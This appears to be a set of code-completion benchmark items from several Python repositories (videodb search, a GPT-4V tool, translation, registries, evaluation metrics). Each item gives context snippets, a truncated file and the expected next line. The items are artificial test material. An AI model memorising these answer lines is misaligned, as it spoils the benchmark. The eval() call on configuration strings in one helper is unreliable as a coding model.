"snippet": "def replace_placeholder_with_args(parameters, **kwargs):\n if isinstance(parameters, ConfigDict):\n for key, v in parameters.items():\n parameters[key] = replace_placeholder_with_args(v, **kwargs)\n return parameters\n elif isinstance(parameters, (tuple, list)):\n type_of_parameters = type(parameters)\n parameters = list(parameters)\n for i, parameter in enumerate(parameters):\n parameters[i] = replace_placeholder_with_args(parameter, **kwargs)\n return type_of_parameters(parameters)\n elif isinstance(parameters, Number):\n return parameters\n elif isinstance(parameters, str):\n for key in kwargs:\n if key in parameters:\n parameters = parameters.replace(key, str(kwargs[key]))\n try:\n return eval(parameters)\n except:\n return parameters\n elif parameters is None:\n return None\n else:\n print(f'Strange type!! {parameters}, type of parameters {type(parameters)}')"
},
{
"identifier": "get_kwargs_from_shape",
"path": "dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/utils.py",
"snippet": "def get_kwargs_from_shape(obs_shape, action_shape):\n replaceable_kwargs = {}\n if action_shape is not None:\n replaceable_kwargs['action_shape'] = action_shape\n if isinstance(obs_shape, dict):\n if 'pointcloud' in obs_shape.keys():\n # For mani_skill point cloud input\n replaceable_kwargs['pcd_all_channel'] = (\n obs_shape['pointcloud']['xyz'][-1] +\n obs_shape['pointcloud']['rgb'][-1] +\n obs_shape['pointcloud']['seg'][-1]\n )\n replaceable_kwargs['num_objs'] = obs_shape['pointcloud']['seg'][-1]\n replaceable_kwargs['pcd_xyz_rgb_channel'] = (\n obs_shape['pointcloud']['xyz'][-1] +\n obs_shape['pointcloud']['rgb'][-1]\n )\n if 'rgbd' in obs_shape.keys():\n # For mani_skill point rgbd input\n mode = list(obs_shape['rgbd'].keys())[0]\n # image format is H, W, C\n replaceable_kwargs['rgbd_channel'] = (\n obs_shape['rgbd'][mode]['rgb'][-1] +\n obs_shape['rgbd'][mode]['depth'][-1] +\n obs_shape['rgbd'][mode]['seg'][-1]\n )\n replaceable_kwargs['agent_shape'] = obs_shape['state']\n else:\n replaceable_kwargs['obs_shape'] = obs_shape\n return replaceable_kwargs"
}
] | from algorithms.utils.mani_skill_learn.utils.data import to_torch
from algorithms.utils.mani_skill_learn.utils.torch import ExtendedModule
from ..builder import POLICYNETWORKS, build_backbone, build_dense_head
from ..utils import replace_placeholder_with_args, get_kwargs_from_shape | 865 |
@POLICYNETWORKS.register_module()
class VAEPolicy(ExtendedModule):
def __init__(self, nn_cfg, policy_head_cfg, action_space, obs_shape=None, action_shape=None):
super(VAEPolicy, self).__init__()
replaceable_kwargs = get_kwargs_from_shape(obs_shape, action_shape)
|
@POLICYNETWORKS.register_module()
class VAEPolicy(ExtendedModule):
def __init__(self, nn_cfg, policy_head_cfg, action_space, obs_shape=None, action_shape=None):
super(VAEPolicy, self).__init__()
replaceable_kwargs = get_kwargs_from_shape(obs_shape, action_shape) | nn_cfg = replace_placeholder_with_args(nn_cfg, **replaceable_kwargs) | 3 | 2023-12-16 16:49:38+00:00 | 2k |
video-db/videodb-python | videodb/search.py | [
{
"identifier": "play_stream",
"path": "videodb/_utils/_video.py",
"snippet": "def play_stream(url: str):\n \"\"\"Play a stream url in the browser/ notebook\n\n :param str url: The url of the stream\n :return: The player url if the stream is opened in the browser or the iframe if the stream is opened in the notebook\n \"\"\"\n player = f\"{PLAYER_URL}?url={url}\"\n opend = web.open(player)\n if not opend:\n try:\n from IPython.display import IFrame\n\n player_width = 800\n player_height = 400\n return IFrame(player, player_width, player_height)\n except ImportError:\n return player\n return player"
},
{
"identifier": "SearchType",
"path": "videodb/_constants.py",
"snippet": "class SearchType:\n semantic = \"semantic\""
},
{
"identifier": "ApiPath",
"path": "videodb/_constants.py",
"snippet": "class ApiPath:\n collection = \"collection\"\n upload = \"upload\"\n video = \"video\"\n stream = \"stream\"\n thumbnail = \"thumbnail\"\n upload_url = \"upload_url\"\n transcription = \"transcription\"\n index = \"index\"\n search = \"search\"\n compile = \"compile\"\n workflow = \"workflow\""
},
{
"identifier": "SemanticSearchDefaultValues",
"path": "videodb/_constants.py",
"snippet": "class SemanticSearchDefaultValues:\n result_threshold = 5\n score_threshold = 0.2"
},
{
"identifier": "SearchError",
"path": "videodb/exceptions.py",
"snippet": "class SearchError(VideodbError):\n \"\"\"\n Raised when a search is invalid.\n \"\"\"\n\n def __init__(self, message):\n super(SearchError, self).__init__(message)"
},
{
"identifier": "Shot",
"path": "videodb/shot.py",
"snippet": "class Shot:\n \"\"\"A shot is a part of a video that contains a specific scene\"\"\"\n\n def __init__(\n self,\n _connection,\n video_id: str,\n video_length: float,\n video_title: str,\n start: float,\n end: float,\n text: Optional[str] = None,\n search_score: Optional[int] = None,\n ) -> None:\n self._connection = _connection\n self.video_id = video_id\n self.video_length = video_length\n self.video_title = video_title\n self.start = start\n self.end = end\n self.text = text\n self.search_score = search_score\n self.stream_url = None\n self.player_url = None\n\n def __repr__(self) -> str:\n return (\n f\"Shot(\"\n f\"video_id={self.video_id}, \"\n f\"video_title={self.video_title}, \"\n f\"start={self.start}, \"\n f\"end={self.end}, \"\n f\"text={self.text}, \"\n f\"search_score={self.search_score}, \"\n f\"stream_url={self.stream_url}, \"\n f\"player_url={self.player_url})\"\n )\n\n def __getitem__(self, key):\n \"\"\"Get an item from the shot object\"\"\"\n return self.__dict__[key]\n\n def generate_stream(self) -> str:\n \"\"\"Generate a stream url for the shot\n\n :return: The stream url\n :rtype: str\n \"\"\"\n\n if self.stream_url:\n return self.stream_url\n else:\n stream_data = self._connection.post(\n path=f\"{ApiPath.video}/{self.video_id}/{ApiPath.stream}\",\n data={\n \"timeline\": [(self.start, self.end)],\n \"length\": self.video_length,\n },\n )\n self.stream_url = stream_data.get(\"stream_url\")\n self.player_url = stream_data.get(\"player_url\")\n return self.stream_url\n\n def play(self) -> str:\n \"\"\"Generate a stream url for the shot and open it in the default browser/ notebook\n\n :return: The stream url\n :rtype: str\n \"\"\"\n self.generate_stream()\n return play_stream(self.stream_url)"
}
] | from abc import ABC, abstractmethod
from videodb._utils._video import play_stream
from videodb._constants import (
SearchType,
ApiPath,
SemanticSearchDefaultValues,
)
from videodb.exceptions import (
SearchError,
)
from typing import Optional, List
from videodb.shot import Shot | 1,478 |
class SearchResult:
def __init__(self, _connection, **kwargs):
self._connection = _connection
self.shots = []
self.stream_url = None
self.player_url = None
self.collection_id = "default"
self._results = kwargs.get("results", [])
self._format_results()
def _format_results(self):
for result in self._results:
self.collection_id = result.get("collection_id")
for doc in result.get("docs"):
self.shots.append(
Shot(
self._connection,
result.get("video_id"),
result.get("length"),
result.get("title"),
doc.get("start"),
doc.get("end"),
doc.get("text"),
doc.get("score"),
)
)
def __repr__(self) -> str:
return (
f"SearchResult("
f"collection_id={self.collection_id}, "
f"stream_url={self.stream_url}, "
f"player_url={self.player_url}, "
f"shots={self.shots})"
)
def get_shots(self) -> List[Shot]:
return self.shots
def compile(self) -> str:
"""Compile the search result shots into a stream url
:raises SearchError: If no shots are found in the search results
:return: The stream url
:rtype: str
"""
if self.stream_url:
return self.stream_url
elif self.shots:
compile_data = self._connection.post(
path=f"{ApiPath.compile}",
data=[
{
"video_id": shot.video_id,
"collection_id": self.collection_id,
"shots": [(shot.start, shot.end)],
}
for shot in self.shots
],
)
self.stream_url = compile_data.get("stream_url")
self.player_url = compile_data.get("player_url")
return self.stream_url
else:
raise SearchError("No shots found in search results to compile")
def play(self) -> str:
"""Generate a stream url for the shot and open it in the default browser
:return: The stream url
:rtype: str
"""
self.compile()
|
class SearchResult:
def __init__(self, _connection, **kwargs):
self._connection = _connection
self.shots = []
self.stream_url = None
self.player_url = None
self.collection_id = "default"
self._results = kwargs.get("results", [])
self._format_results()
def _format_results(self):
for result in self._results:
self.collection_id = result.get("collection_id")
for doc in result.get("docs"):
self.shots.append(
Shot(
self._connection,
result.get("video_id"),
result.get("length"),
result.get("title"),
doc.get("start"),
doc.get("end"),
doc.get("text"),
doc.get("score"),
)
)
def __repr__(self) -> str:
return (
f"SearchResult("
f"collection_id={self.collection_id}, "
f"stream_url={self.stream_url}, "
f"player_url={self.player_url}, "
f"shots={self.shots})"
)
def get_shots(self) -> List[Shot]:
return self.shots
def compile(self) -> str:
"""Compile the search result shots into a stream url
:raises SearchError: If no shots are found in the search results
:return: The stream url
:rtype: str
"""
if self.stream_url:
return self.stream_url
elif self.shots:
compile_data = self._connection.post(
path=f"{ApiPath.compile}",
data=[
{
"video_id": shot.video_id,
"collection_id": self.collection_id,
"shots": [(shot.start, shot.end)],
}
for shot in self.shots
],
)
self.stream_url = compile_data.get("stream_url")
self.player_url = compile_data.get("player_url")
return self.stream_url
else:
raise SearchError("No shots found in search results to compile")
def play(self) -> str:
"""Generate a stream url for the shot and open it in the default browser
:return: The stream url
:rtype: str
"""
self.compile() | return play_stream(self.stream_url) | 0 | 2023-12-18 15:20:04+00:00 | 2k |
IDEA-CCNL/Real-Gemini | real_gemini/tools/gpt4v_tool.py | [
{
"identifier": "load_image",
"path": "real_gemini/utils/image_stacker.py",
"snippet": "def load_image(path):\n image = Image.open(path)\n return image"
},
{
"identifier": "image2base64",
"path": "real_gemini/utils/image_stacker.py",
"snippet": "def image2base64(image):\n buffered = BytesIO()\n image.save(buffered, format=\"PNG\")\n return base64.b64encode(buffered.getvalue()).decode()"
}
] | import os
import json
from typing import List
from langchain.memory import ChatMessageHistory
from langchain.chat_models import ChatOpenAI
from langchain_core.messages import HumanMessage, SystemMessage
from ..utils.image_stacker import load_image, image2base64 | 727 | #encoding=utf8
_OPEN_AI_SYSTEM_PROMPT = """the user is dictating with his or her camera on.
they are showing you things visually and giving you text prompts.
be very brief and concise.
be extremely concise. this is very important for my career. do not ramble.
do not comment on what the person is wearing or where they are sitting or their background.
focus on their gestures and the question they ask you.
do not mention that there are a sequence of pictures. focus only on the image or the images necessary to answer the question.
don't comment if they are smiling. don't comment if they are frowning. just focus on what they're asking.
"""
class GPT4VTool(object):
_name_ = "GPT-4-Vision"
_description_ = "这个工具是GPT for vision的调用接口。用于图像到文本的理解。本工具的输入是一段文本指令和一张或者多张图片,请注意,工具的输入由一个JSON字符串组成,json包括两个key,question和image_input。question表示文本指令,image_input表示图片路径或存放图片的目录。例如:{{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}。A wrapper around OpenAI GPT4V API. Useful for image-to-text understanding when you need to generate text from some images and a text description. The input of this tool is a text prompt and one or more images. Please note, the input of the tool consists of a JSON string, the json includes two keys, question and image_input. The question represents text instructions, and image_input represents the image path or the directory where the images are stored. For example: {{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}."
_return_direct_ = False
def __init__(self):
self._gpt4v = ChatOpenAI(
model="gpt-4-vision-preview",
max_tokens=256)
self.max_dialog_turn = 3
self.history = ChatMessageHistory()
self.history.add_message(
SystemMessage(
content=[
{"type": "text", "text": _OPEN_AI_SYSTEM_PROMPT}
]
)
)
def inference(self, input_str: str):
input_dict = json.loads(input_str)
image_path = input_dict["image_input"]
if os.path.isdir(image_path):
image_paths = [
os.path.join(image_path, path) for path in os.listdir(image_path)]
else:
image_paths = [image_path]
base64_images = []
for image_path in image_paths:
| #encoding=utf8
_OPEN_AI_SYSTEM_PROMPT = """the user is dictating with his or her camera on.
they are showing you things visually and giving you text prompts.
be very brief and concise.
be extremely concise. this is very important for my career. do not ramble.
do not comment on what the person is wearing or where they are sitting or their background.
focus on their gestures and the question they ask you.
do not mention that there are a sequence of pictures. focus only on the image or the images necessary to answer the question.
don't comment if they are smiling. don't comment if they are frowning. just focus on what they're asking.
"""
class GPT4VTool(object):
_name_ = "GPT-4-Vision"
_description_ = "这个工具是GPT for vision的调用接口。用于图像到文本的理解。本工具的输入是一段文本指令和一张或者多张图片,请注意,工具的输入由一个JSON字符串组成,json包括两个key,question和image_input。question表示文本指令,image_input表示图片路径或存放图片的目录。例如:{{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}。A wrapper around OpenAI GPT4V API. Useful for image-to-text understanding when you need to generate text from some images and a text description. The input of this tool is a text prompt and one or more images. Please note, the input of the tool consists of a JSON string, the json includes two keys, question and image_input. The question represents text instructions, and image_input represents the image path or the directory where the images are stored. For example: {{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}."
_return_direct_ = False
def __init__(self):
self._gpt4v = ChatOpenAI(
model="gpt-4-vision-preview",
max_tokens=256)
self.max_dialog_turn = 3
self.history = ChatMessageHistory()
self.history.add_message(
SystemMessage(
content=[
{"type": "text", "text": _OPEN_AI_SYSTEM_PROMPT}
]
)
)
def inference(self, input_str: str):
input_dict = json.loads(input_str)
image_path = input_dict["image_input"]
if os.path.isdir(image_path):
image_paths = [
os.path.join(image_path, path) for path in os.listdir(image_path)]
else:
image_paths = [image_path]
base64_images = []
for image_path in image_paths: | base64_image = image2base64(load_image(image_path)) | 1 | 2023-12-15 04:09:37+00:00 | 2k |
aiim-research/GRETEL | src/evaluation/evaluation_metric_smiles_levenshtein.py | [
{
"identifier": "EvaluationMetric",
"path": "src/evaluation/evaluation_metric_base.py",
"snippet": "class EvaluationMetric(ABC):\n\n def __init__(self, config_dict=None) -> None:\n super().__init__()\n self._name = 'abstract_metric'\n self._config_dict = config_dict\n self._special = False #TODO: this must be removed in the future just to manage Runtime NOW QUICKFIX \n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, new_name):\n self._name = new_name\n\n @abstractmethod\n def evaluate(self, instance_1 , instance_2 , oracle : Oracle=None, explainer : Explainer=None, dataset = None):\n pass\n\n def aggregate(self,measure_list):\n return np.mean(measure_list),np.std(measure_list)"
},
{
"identifier": "Oracle",
"path": "src/core/oracle_base.py",
"snippet": "class Oracle(Trainable,metaclass=ABCMeta):\n def __init__(self, context:Context, local_config) -> None:\n super().__init__(context, local_config)\n self._call_counter = 0\n \n @final\n def predict(self, data_instance):\n \"\"\"predicts the label of a given data instance\n -------------\n INPUT:\n data_instance : The instance whose class is going to be predicted \n -------------\n OUTPUT:\n The predicted label for the data instance\n \"\"\"\n self._call_counter += 1\n\n return self._real_predict(data_instance)\n\n @final\n def predict_proba(self, data_instance):\n \"\"\"predicts the probability estimates for a given data instance\n -------------\n INPUT:\n data_instance : The instance whose class is going to be predicted \n -------------\n OUTPUT:\n The predicted probability estimates for the data instance\n \"\"\"\n self._call_counter += 1\n\n return self._real_predict_proba(data_instance)\n\n @final\n def get_calls_count(self):\n return self._call_counter\n \n @final\n def reset_call_count(self):\n self._call_counter = 0 \n\n @final\n def predict_list(self, dataset: Dataset, fold_id=0):\n sptest = dataset.get_split_indices()[fold_id]['test']\n result = [self.predict(dataset.get_instance(i)) for i in sptest]\n return result\n \n '''@abstractmethod'''#TODO: need to be reactivated and implemented. May can be removed accordingly to Mario and GRETEL philosphy\n def evaluate(self, dataset: Dataset, fold_id=0):\n pass\n \n @abstractmethod\n def _real_predict(self, data_instance):\n pass\n \n @abstractmethod\n def _real_predict_proba(self, data_instance):\n pass"
},
{
"identifier": "Explainer",
"path": "src/core/explainer_base.py",
"snippet": "class Explainer(Configurable, metaclass=ABCMeta):\n \n def __init__(self, context: Context, local_config):\n self.dataset = retake_dataset(local_config)\n self.oracle = retake_oracle(local_config)\n super().__init__(context, local_config)\n \n\n @abstractmethod\n def explain(self, instance):\n pass\n\n def check_configuration(self):\n super().check_configuration()\n self.local_config['parameters']['fold_id'] = self.local_config['parameters'].get('fold_id', -1)\n self.fold_id = self.local_config['parameters']['fold_id'] "
}
] | from functools import lru_cache
from src.evaluation.evaluation_metric_base import EvaluationMetric
from src.core.oracle_base import Oracle
from src.core.explainer_base import Explainer | 960 |
class SmilesLevenshteinMetric(EvaluationMetric):
"""Provides the ratio between the number of features modified to obtain the counterfactual example
and the number of features in the original instance. Only considers structural features.
"""
def __init__(self, config_dict=None) -> None:
super().__init__(config_dict)
self._name = 'Smiles-Levenshtein'
|
class SmilesLevenshteinMetric(EvaluationMetric):
"""Provides the ratio between the number of features modified to obtain the counterfactual example
and the number of features in the original instance. Only considers structural features.
"""
def __init__(self, config_dict=None) -> None:
super().__init__(config_dict)
self._name = 'Smiles-Levenshtein'
| def evaluate(self, instance_1 , instance_2 , oracle : Oracle=None, explainer : Explainer=None, dataset = None): | 1 | 2023-12-15 16:34:16+00:00 | 2k |
modelscope/scepter | scepter/modules/opt/lr_schedulers/registry.py | [
{
"identifier": "Registry",
"path": "scepter/modules/utils/registry.py",
"snippet": "class Registry(object):\n \"\"\" A registry maps key to classes or functions.\n\n Example:\n # >>> MODELS = Registry('MODELS')\n # >>> @MODELS.register_class()\n # >>> class ResNet(object):\n # >>> pass\n # >>> config = Config(cfg_dict = {\"NAME\":\"ResNet\"})\n # >>> resnet = MODELS.build(config)\n # >>>\n # >>> import torchvision\n # >>> @MODELS.register_function(\"InceptionV3\")\n # >>> def get_inception_v3(pretrained=False, progress=True):\n # >>> return torchvision.model.inception_v3(pretrained=pretrained, progress=progress)\n # >>> config = Config(cfg_dict = {\"NAME\":\"InceptionV3\"})\n # >>> inception_v3 = MODELS.build(config)\n\n Args:\n name (str): Registry name.\n build_func (func, None): Instance construct function. Default is build_from_config.\n allow_types (tuple): Indicates how to construct the instance, by constructing class or invoking function.\n \"\"\"\n def __init__(self,\n name,\n build_func=None,\n common_para=None,\n allow_types=('class', 'function')):\n self.name = name\n self.allow_types = allow_types\n self.class_map = {}\n self.func_map = {}\n self.common_para = common_para\n self.build_func = build_func or build_from_config\n REGISTRY_LIST.append(self)\n\n def get(self, req_type):\n return self.class_map.get(req_type) or self.func_map.get(req_type)\n\n def build(self, cfg, logger=None, *args, **kwargs):\n return self.build_func(cfg,\n registry=self,\n logger=logger,\n *args,\n **kwargs)\n\n def register_class(self, name=None):\n def _register(cls):\n if not inspect.isclass(cls):\n raise TypeError(f'Module must be type class, got {type(cls)}')\n if 'class' not in self.allow_types:\n raise TypeError(\n f'Register {self.name} only allows type {self.allow_types}, got class'\n )\n module_name = name or cls.__name__\n if module_name in self.class_map:\n warnings.warn(\n f'Class {module_name} already registered by {self.class_map[module_name]}, '\n f'will be replaced by {cls}')\n self.class_map[module_name] = cls\n return cls\n\n return _register\n\n def register_function(self, name=None):\n def _register(func):\n if not inspect.isfunction(func):\n raise TypeError(\n f'Registry must be type function, got {type(func)}')\n if 'function' not in self.allow_types:\n raise TypeError(\n f'Registry {self.name} only allows type {self.allow_types}, got function'\n )\n func_name = name or func.__name__\n if func_name in self.class_map:\n warnings.warn(\n f'Function {func_name} already registered by {self.func_map[func_name]}, '\n f'will be replaced by {func}')\n self.func_map[func_name] = func\n return func\n\n return _register\n\n def _list(self):\n keys = sorted(list(self.class_map.keys()) + list(self.func_map.keys()))\n descriptions = []\n for key in keys:\n if key in self.class_map:\n descriptions.append(f'{key}: {self.class_map[key]}')\n else:\n descriptions.append(\n f\"{key}: <function '{self.func_map[key].__module__}.{self.func_map[key].__name__}'>\"\n )\n return '\\n'.join(descriptions)\n\n def __repr__(self):\n description = self._list()\n description = '\\n'.join(['\\t' + s for s in description.split('\\n')])\n return f'{self.__class__.__name__} [{self.name}], \\n' + description\n\n def get_config_template(self, name):\n common_yaml_str = ''\n if self.common_para is not None:\n common_yaml_str += 'The following para are used for this class.\\n'\n common_yaml_str += dict_to_yaml('common_parameter',\n __class__.__name__,\n self.common_para,\n set_name=False)\n\n req_type_entry = self.get(name)\n if req_type_entry is None:\n raise KeyError(f'{name} not found 
in {self.name} registry')\n if inspect.isclass(req_type_entry):\n return req_type_entry.get_config_template() + common_yaml_str\n elif inspect.isfunction(req_type_entry):\n return '{} is a function!'.format(name)\n else:\n return 'Unsurport object type!'"
},
{
"identifier": "deep_copy",
"path": "scepter/modules/utils/registry.py",
"snippet": "def deep_copy(obj):\n return obj"
}
] | import inspect
from scepter.modules.utils.registry import Registry, deep_copy
from scepter.modules.utils.config import Config | 1,272 | # -*- coding: utf-8 -*-
# Copyright (c) Alibaba, Inc. and its affiliates.
def build_lr_scheduler(cfg, registry, logger=None, *args, **kwargs):
if not isinstance(cfg, Config):
raise TypeError(f'config must be type dict, got {type(cfg)}')
if not cfg.have('NAME'):
raise KeyError(f'config must contain key NAME, got {cfg}')
| # -*- coding: utf-8 -*-
# Copyright (c) Alibaba, Inc. and its affiliates.
def build_lr_scheduler(cfg, registry, logger=None, *args, **kwargs):
if not isinstance(cfg, Config):
raise TypeError(f'config must be type dict, got {type(cfg)}')
if not cfg.have('NAME'):
raise KeyError(f'config must contain key NAME, got {cfg}') | if not isinstance(registry, Registry): | 0 | 2023-12-21 02:01:48+00:00 | 2k |
pigeonai-org/ViDove | src/translators/translation.py | [
{
"identifier": "LLM_task",
"path": "src/translators/LLM_task.py",
"snippet": "def LLM_task(model_name, input, task, temp = 0.15):\n \"\"\"\n Translates input sentence with desired LLM.\n\n :param model_name: The name of the translation model to be used.\n :param input: Sentence for translation.\n :param task: Prompt.\n :param temp: Model temperature.\n \"\"\"\n if model_name in [\"gpt-3.5-turbo\", \"gpt-4\", \"gpt-4-1106-preview\"]:\n response = openai.ChatCompletion.create(\n model=model_name,\n messages=[\n {\"role\": \"system\",\"content\": task},\n {\"role\": \"user\", \"content\": input}\n ],\n temperature=temp\n )\n return response['choices'][0]['message']['content'].strip()\n # Other LLM not implemented\n else:\n raise NotImplementedError"
},
{
"identifier": "split_script",
"path": "src/srt_util/srt.py",
"snippet": "def split_script(script_in, chunk_size=1000):\n script_split = script_in.split('\\n\\n')\n script_arr = []\n range_arr = []\n start = 1\n end = 0\n script = \"\"\n for sentence in script_split:\n if len(script) + len(sentence) + 1 <= chunk_size:\n script += sentence + '\\n\\n'\n end += 1\n else:\n range_arr.append((start, end))\n start = end + 1\n end += 1\n script_arr.append(script.strip())\n script = sentence + '\\n\\n'\n if script.strip():\n script_arr.append(script.strip())\n range_arr.append((start, len(script_split) - 1))\n\n assert len(script_arr) == len(range_arr)\n return script_arr, range_arr"
}
] | from os import getenv
from time import sleep
from tqdm import tqdm
from .LLM_task import LLM_task
from src.srt_util.srt import split_script
import logging | 1,289 |
def get_translation(srt, model, video_name, prompt = None, chunk_size = 1000):
# print(srt.get_source_only())
script_arr, range_arr = split_script(srt.get_source_only(),chunk_size)
translate(srt, script_arr, range_arr, model, video_name, task=prompt)
pass
def check_translation(sentence, translation):
"""
check merge sentence issue from openai translation
"""
sentence_count = sentence.count('\n\n') + 1
translation_count = translation.count('\n\n') + 1
if sentence_count != translation_count:
return False
else:
return True
# TODO{david}: prompts selector
def prompt_selector(src_lang, tgt_lang, domain):
language_map = {
"EN": "English",
"ZH": "Chinese",
"ES": "Spanish",
"FR": "France",
"DE": "Germany",
"RU": "Russian",
"JA": "Japanese",
"AR": "Arabic",
}
try:
src_lang = language_map[src_lang]
tgt_lang = language_map[tgt_lang]
except:
print("Unsupported language, is your abbreviation correct?")
logging.info("Unsupported language detected")
prompt = f"""
you are a translation assistant, your job is to translate a video in domain of {domain} from {src_lang} to {tgt_lang},
you will be provided with a segement in {src_lang} parsed by line, where your translation text should keep the original
meaning and the number of lines.
"""
return prompt
def translate(srt, script_arr, range_arr, model_name, video_name=None, attempts_count=5, task=None, temp = 0.15):
"""
Translates the given script array into another language using the chatgpt and writes to the SRT file.
This function takes a script array, a range array, a model name, a video name, and a video link as input. It iterates
through sentences and range in the script and range arrays. If the translation check fails for five times, the function
will attempt to resolve merge sentence issues and split the sentence into smaller tokens for a better translation.
:param srt: An instance of the Subtitle class representing the SRT file.
:param script_arr: A list of strings representing the original script sentences to be translated.
:param range_arr: A list of tuples representing the start and end positions of sentences in the script.
:param model_name: The name of the translation model to be used.
:param video_name: The name of the video.
:param attempts_count: Number of attemps of failures for unmatched sentences.
:param task: Prompt.
:param temp: Model temperature.
"""
if input is None:
raise Exception("Warning! No Input have passed to LLM!")
if task is None:
task = "你是一个翻译助理,你的任务是翻译视频,你会被提供一个按行分割的英文段落,你需要在保证句意和行数的情况下输出翻译后的文本。"
logging.info(f"translation prompt: {task}")
previous_length = 0
for sentence, range_ in tqdm(zip(script_arr, range_arr)):
# update the range based on previous length
range_ = (range_[0] + previous_length, range_[1] + previous_length)
# using chatgpt model
print(f"now translating sentences {range_}")
logging.info(f"now translating sentences {range_}")
flag = True
while flag:
flag = False
try:
|
def get_translation(srt, model, video_name, prompt = None, chunk_size = 1000):
# print(srt.get_source_only())
script_arr, range_arr = split_script(srt.get_source_only(),chunk_size)
translate(srt, script_arr, range_arr, model, video_name, task=prompt)
pass
def check_translation(sentence, translation):
"""
check merge sentence issue from openai translation
"""
sentence_count = sentence.count('\n\n') + 1
translation_count = translation.count('\n\n') + 1
if sentence_count != translation_count:
return False
else:
return True
# TODO{david}: prompts selector
def prompt_selector(src_lang, tgt_lang, domain):
language_map = {
"EN": "English",
"ZH": "Chinese",
"ES": "Spanish",
"FR": "France",
"DE": "Germany",
"RU": "Russian",
"JA": "Japanese",
"AR": "Arabic",
}
try:
src_lang = language_map[src_lang]
tgt_lang = language_map[tgt_lang]
except:
print("Unsupported language, is your abbreviation correct?")
logging.info("Unsupported language detected")
prompt = f"""
you are a translation assistant, your job is to translate a video in domain of {domain} from {src_lang} to {tgt_lang},
you will be provided with a segement in {src_lang} parsed by line, where your translation text should keep the original
meaning and the number of lines.
"""
return prompt
def translate(srt, script_arr, range_arr, model_name, video_name=None, attempts_count=5, task=None, temp = 0.15):
"""
Translates the given script array into another language using the chatgpt and writes to the SRT file.
This function takes a script array, a range array, a model name, a video name, and a video link as input. It iterates
through sentences and range in the script and range arrays. If the translation check fails for five times, the function
will attempt to resolve merge sentence issues and split the sentence into smaller tokens for a better translation.
:param srt: An instance of the Subtitle class representing the SRT file.
:param script_arr: A list of strings representing the original script sentences to be translated.
:param range_arr: A list of tuples representing the start and end positions of sentences in the script.
:param model_name: The name of the translation model to be used.
:param video_name: The name of the video.
:param attempts_count: Number of attemps of failures for unmatched sentences.
:param task: Prompt.
:param temp: Model temperature.
"""
if input is None:
raise Exception("Warning! No Input have passed to LLM!")
if task is None:
task = "你是一个翻译助理,你的任务是翻译视频,你会被提供一个按行分割的英文段落,你需要在保证句意和行数的情况下输出翻译后的文本。"
logging.info(f"translation prompt: {task}")
previous_length = 0
for sentence, range_ in tqdm(zip(script_arr, range_arr)):
# update the range based on previous length
range_ = (range_[0] + previous_length, range_[1] + previous_length)
# using chatgpt model
print(f"now translating sentences {range_}")
logging.info(f"now translating sentences {range_}")
flag = True
while flag:
flag = False
try: | translate = LLM_task(model_name, sentence, task, temp) | 0 | 2023-12-20 01:46:47+00:00 | 2k |
YyzHarry/shortcut-ood-fairness | utils/lin_eval.py | [
{
"identifier": "binary_metrics",
"path": "utils/eval_helper.py",
"snippet": "def binary_metrics(targets, preds, label_set=[0, 1], suffix='', return_arrays=False):\n if len(targets) == 0:\n return {}\n\n res = {\n 'accuracy': accuracy_score(targets, preds),\n 'n_samples': len(targets)\n }\n\n if len(label_set) == 2:\n CM = confusion_matrix(targets, preds, labels=label_set)\n\n res['TN'] = CM[0][0].item()\n res['FN'] = CM[1][0].item()\n res['TP'] = CM[1][1].item()\n res['FP'] = CM[0][1].item()\n\n res['error'] = res['FN'] + res['FP']\n\n if res['TP'] + res['FN'] == 0:\n res['TPR'] = 0\n res['FNR'] = 1\n else:\n res['TPR'] = res['TP']/(res['TP']+res['FN'])\n res['FNR'] = res['FN']/(res['TP']+res['FN'])\n\n if res['FP'] + res['TN'] == 0:\n res['FPR'] = 1\n res['TNR'] = 0\n else:\n res['FPR'] = res['FP']/(res['FP']+res['TN'])\n res['TNR'] = res['TN']/(res['FP']+res['TN'])\n\n res['pred_prevalence'] = (res['TP'] + res['FP']) / res['n_samples']\n res['prevalence'] = (res['TP'] + res['FN']) / res['n_samples']\n else:\n CM = confusion_matrix(targets, preds, labels=label_set)\n res['TPR'] = recall_score(targets, preds, labels=label_set, average='macro', zero_division=0.)\n\n if len(np.unique(targets)) > 1:\n res['balanced_acc'] = balanced_accuracy_score(targets, preds)\n\n if return_arrays:\n res['targets'] = targets\n res['preds'] = preds\n\n return {f\"{i}{suffix}\": res[i] for i in res}"
},
{
"identifier": "prob_metrics",
"path": "utils/eval_helper.py",
"snippet": "def prob_metrics(targets, preds, label_set, return_arrays=False):\n if len(targets) == 0:\n return {}\n\n res = {\n 'BCE': log_loss(targets, preds, eps=1e-6, labels=label_set),\n 'ECE': netcal.metrics.ECE().measure(preds, targets)\n }\n\n if len(set(targets)) > 2:\n # happens when you predict a class, but there are no samples with that class in the dataset\n try:\n res['AUROC'] = roc_auc_score(targets, preds, multi_class='ovr', labels=label_set)\n except:\n res['AUROC'] = roc_auc_score(targets, preds, multi_class='ovo', labels=label_set)\n elif len(set(targets)) == 2:\n res['AUROC'] = roc_auc_score(targets, preds, labels=label_set)\n elif len(set(targets)) == 1:\n res['AUROC'] = None\n\n if len(set(targets)) == 2:\n # res['ROC_curve'] = roc_curve(targets, preds)\n res['AUPRC'] = average_precision_score(targets, preds, average='macro')\n res['brier'] = brier_score_loss(targets, preds)\n res['mean_pred_1'] = preds[targets == 1].mean()\n res['mean_pred_0'] = preds[targets == 0].mean()\n\n if return_arrays:\n res['targets'] = targets\n res['preds'] = preds\n\n return res"
}
] | import numpy as np
import torch
from utils.eval_helper import binary_metrics, prob_metrics
from sklearn.model_selection import GridSearchCV, PredefinedSplit
from sklearn.pipeline import Pipeline
from sklearn.linear_model import LogisticRegression
from sklearn.base import clone
from sklearn.metrics import roc_auc_score
from sklearn.ensemble import RandomForestClassifier | 1,460 |
def get_representations(algorithm, loader, device):
ys, atts, zs = [], [], []
algorithm.eval()
with torch.no_grad():
for _, x, y, a in loader:
z = algorithm.return_feats(x.to(device)).detach().cpu().numpy()
zs.append(z)
ys.append(y)
atts.append(a)
return np.concatenate(zs, axis=0), np.concatenate(atts, axis=0), np.concatenate(ys, axis=0)
